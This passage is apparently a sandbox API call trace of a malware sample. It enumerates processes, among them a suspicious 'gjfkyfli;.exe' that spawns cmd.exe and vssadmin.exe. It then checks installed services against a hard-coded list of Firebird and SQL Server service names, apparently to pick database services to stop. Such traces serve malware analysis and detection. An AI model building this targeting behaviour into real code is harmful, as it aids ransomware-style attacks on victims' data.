	[0052.309] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0052.309] lstrlenW (lpString="computers.exe") returned 13
	[0052.310] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0052.310] lstrlenW (lpString="separated.exe") returned 13
	[0052.310] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0052.310] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0052.310] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0052.311] lstrlenW (lpString="darkness.exe") returned 12
	[0052.311] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0052.311] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0052.311] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0052.312] lstrlenW (lpString="sophisticated.exe") returned 17
	[0052.312] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0052.312] lstrlenW (lpString="wishlist.exe") returned 12
	[0052.312] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0052.313] lstrlenW (lpString="top.exe") returned 7
	[0052.313] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0052.313] lstrlenW (lpString="implemented.exe") returned 15
	[0052.313] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0052.314] lstrlenW (lpString="comp.exe") returned 8
	[0052.314] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0052.314] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0052.314] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0052.315] lstrlenW (lpString="solved.exe") returned 10
	[0052.315] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0052.315] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0052.315] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0052.316] lstrlenW (lpString="trips.exe") returned 9
	[0052.316] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0052.316] lstrlenW (lpString="tumormanual.exe") returned 15
	[0052.316] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0052.317] lstrlenW (lpString="telecom.exe") returned 11
	[0052.317] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0052.317] lstrlenW (lpString="realistic.exe") returned 13
	[0052.317] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0052.318] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0052.318] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0052.318] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0052.318] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0052.319] lstrlenW (lpString="cmd.exe") returned 7
	[0052.319] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0052.319] lstrlenW (lpString="conhost.exe") returned 11
	[0052.319] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0052.320] lstrlenW (lpString="vssadmin.exe") returned 12
	[0052.320] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0052.320] lstrlenW (lpString="VSSVC.exe") returned 9
	[0052.320] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0052.321] lstrlenW (lpString="svchost.exe") returned 11
	[0052.321] Process32NextW (in: hSnapshot=0x1a0, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0052.321] CloseHandle (hObject=0x1a0) returned 1
	[0052.321] Sleep (dwMilliseconds=0x1f4) 
	[0052.936] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df3198
	[0053.242] EnumServicesStatusExW (in: hSCManager=0x7df3198, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0053.245] GetLastError () returned 0xea
	[0053.245] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0053.248] EnumServicesStatusExW (in: hSCManager=0x7df3198, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0053.253] CloseServiceHandle (hSCObject=0x7df3198) returned 1
	[0053.254] lstrlenW (lpString="Appinfo") returned 7
	[0053.254] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0053.254] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0053.254] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0053.254] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0053.254] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0053.254] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0053.254] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0053.254] lstrlenW (lpString="AudioSrv") returned 8
	[0053.254] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0053.254] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0053.254] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0053.254] lstrlenW (lpString="BFE") returned 3
	[0053.254] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0053.254] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0053.254] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0053.254] lstrlenW (lpString="CryptSvc") returned 8
	[0053.254] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0053.254] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0053.254] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0053.254] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0053.254] lstrlenW (lpString="CscService") returned 10
	[0053.254] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0053.254] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0053.255] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0053.255] lstrlenW (lpString="DcomLaunch") returned 10
	[0053.255] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0053.255] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0053.255] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0053.255] lstrlenW (lpString="Dhcp") returned 4
	[0053.255] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0053.255] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0053.255] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0053.255] lstrlenW (lpString="Dnscache") returned 8
	[0053.255] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0053.255] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0053.255] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0053.255] lstrlenW (lpString="DPS") returned 3
	[0053.255] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0053.255] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0053.255] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0053.255] lstrlenW (lpString="eventlog") returned 8
	[0053.255] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0053.255] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0053.255] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0053.255] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0053.255] lstrlenW (lpString="EventSystem") returned 11
	[0053.255] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0053.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0053.256] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0053.256] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0053.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0053.256] lstrlenW (lpString="gpsvc") returned 5
	[0053.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0053.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0053.256] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0053.256] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0053.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0053.256] lstrlenW (lpString="iphlpsvc") returned 8
	[0053.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0053.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0053.256] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0053.256] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0053.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0053.256] lstrlenW (lpString="LanmanServer") returned 12
	[0053.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0053.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0053.256] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0053.256] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0053.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0053.256] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0053.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0053.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0053.256] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0053.256] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0053.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0053.256] lstrlenW (lpString="lmhosts") returned 7
	[0053.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0053.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0053.256] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0053.256] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0053.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0053.256] lstrlenW (lpString="MMCSS") returned 5
	[0053.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0053.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0053.257] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0053.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0053.257] lstrlenW (lpString="MpsSvc") returned 6
	[0053.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0053.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0053.257] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0053.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0053.257] lstrlenW (lpString="Netman") returned 6
	[0053.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0053.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0053.257] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0053.257] lstrlenW (lpString="netprofm") returned 8
	[0053.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0053.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0053.257] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0053.257] lstrlenW (lpString="NlaSvc") returned 6
	[0053.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0053.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0053.257] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0053.257] lstrlenW (lpString="nsi") returned 3
	[0053.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0053.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0053.257] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0053.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0053.258] lstrlenW (lpString="PcaSvc") returned 6
	[0053.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0053.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0053.258] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0053.258] lstrlenW (lpString="PlugPlay") returned 8
	[0053.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0053.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0053.258] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0053.258] lstrlenW (lpString="Power") returned 5
	[0053.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0053.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0053.258] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0053.258] lstrlenW (lpString="ProfSvc") returned 7
	[0053.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0053.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0053.258] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0053.258] lstrlenW (lpString="RpcEptMapper") returned 12
	[0053.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0053.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0053.258] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0053.258] lstrlenW (lpString="RpcSs") returned 5
	[0053.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0053.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0053.258] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0053.258] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0053.259] lstrlenW (lpString="SamSs") returned 5
	[0053.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0053.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0053.259] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0053.259] lstrlenW (lpString="Schedule") returned 8
	[0053.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0053.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0053.259] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0053.259] lstrlenW (lpString="SENS") returned 4
	[0053.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0053.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0053.259] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0053.259] lstrlenW (lpString="ShellHWDetection") returned 16
	[0053.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0053.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0053.259] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0053.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0053.259] lstrlenW (lpString="Spooler") returned 7
	[0053.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
